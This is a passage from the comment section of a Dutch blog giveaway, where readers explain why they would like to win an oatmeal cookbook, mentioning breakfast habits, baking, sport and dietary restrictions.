  Waarom ik dit boek wil winnen? Je kan zo veel met havermout doen! Ik ben gek op bakken en recepten uit proberen, maar zelf recepten verzinnen ben ik niet zo goed in hihi. Dit boek zou dus enorm handig zijn! Ik ontbijt iedere dag met havermout, en maak er ook vaak meel van als ik aan het bakken ben. Sinds kort ben ik begonnen met het uitbreiden van mijn kookboekencollectie en zou dit boek graag een mooi plekje in m’n keuken willen geven!

 81. Shirley zegt:

  Ik ben voor mezelf maar vooral mijn dochtertje van 6 jaar op zoek naar “gezonde” lekkere recepten, ik wil haar op een verantwoorde manier wat lekkers voorschotelen.

 82. Linda zegt:

  Ik wil gewoon heel graag dit kookboek :)! Ik sport steeds meer en havermout legt altijd een goed bodempje voor een fijne run/workout. Maar kan zeker wat inspiratie gebruiken voor leuke recepten!

 83. Nancy zegt:

  Ik ben vorige week begonnen om mijn voedingschema om te gooien, maak nu elke ochtend havermoutpap en doe daar kaneel en kruiden bij! Het is erg lekker, maar om dit recept nu nog weken te gaan eten zie ik niet zo zitten.. En omdat er heel veel meer ontbijtjes zijn met havermout maar ik zelf geen idee heb welke & wel heeeel graan havermout wil blijven eten om weer op mijn oude gewicht te komen “-10” lijkt mij dit de uitgelezen kans om aan het boek te komen

 84. stefanie zegt:

  Ik vind het een geweldig concept. Om zoveel met havermout te doen, super gezond en lekker. Je wordt alleen maar geïnspireerd door ze. Dus dit boek moet bij mij in de collectie terecht komen. Ik wil heel graag mijn lief ‘s ochtends verwennen met een heerlijk havermout ontbijtje. maar dan heb ik wel het receptenboek nodig 🙂

 85. Veronica zegt:

  Dit boek lijkt me een hele gave inspiratie bron om nieuwe lekkere dingen te maken met havermout. Ik deed laatst mee met een 30dagen challange en heb deze goed volgehouden, hierin kennis gemaakt met havermout (in bananenpannekoeken) en nu nieuwsgierig naar wat je eigenlijk allemaal kan met havermout!

 86. Eva zegt:

  Ik eet glutenvrij en Fodmap- en histaminebeperkt, en heb veel moeite om nog lekkere en gezonde dingen te vinden die ik mag eten. Gelukkig kan ik wel haver eten, maar ik eet eigenlijk altijd dezelfde dingen. Lijkt me super om variaties te vinden! En zo veel keus!

 87. Rachel zegt:

  Havermout is superlekker, ik eet het elke dag. Verder dan de totaal verslavende havermoutkoekjes en havermoutpannenkoekjes ben ik nog niet gekomen. Ik ben ontzettend benieuwd naar alle andere variaties die in het boek staan! Nu lekker aan mijn beetje late havermoutontbijtje en in spanning afwachten of er een boek mijn kant op komt ☺️

 88. eva zegt:

  havermout voor ontbijt havermout voor lunch en guess what…havermout voor diner….het is een verslaving. ik kan wel wat variatietips gebruiken!

 89. Anita H. zegt:

  De recente enorm positieve berichten over het eten havermout zijn me niet ontgaan. Ik heb er veel voor over om gezond door het leven te gaan. Gezonde voeding heeft al jaren mijn belangstelling en ik ben mijns inziens ook goed bezig (geen tarwe; geen zuivel; geen toegevoegde suiker; puur). Eerlijk gezegd heb ik nog nooit havermout gegeten. Dat leek me eigenlijk ook niet zo smakelijk. Dankzij de vele recepten die ik via blogs en zo op internet voorbij zie komen, is mijn interesse wel gewekt. Vooral interessant als ontbijt (dat voor mij tot nu toe weinig variatie kent). Dit te winnen boek stond sowieso al op mijn wensenlijst.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *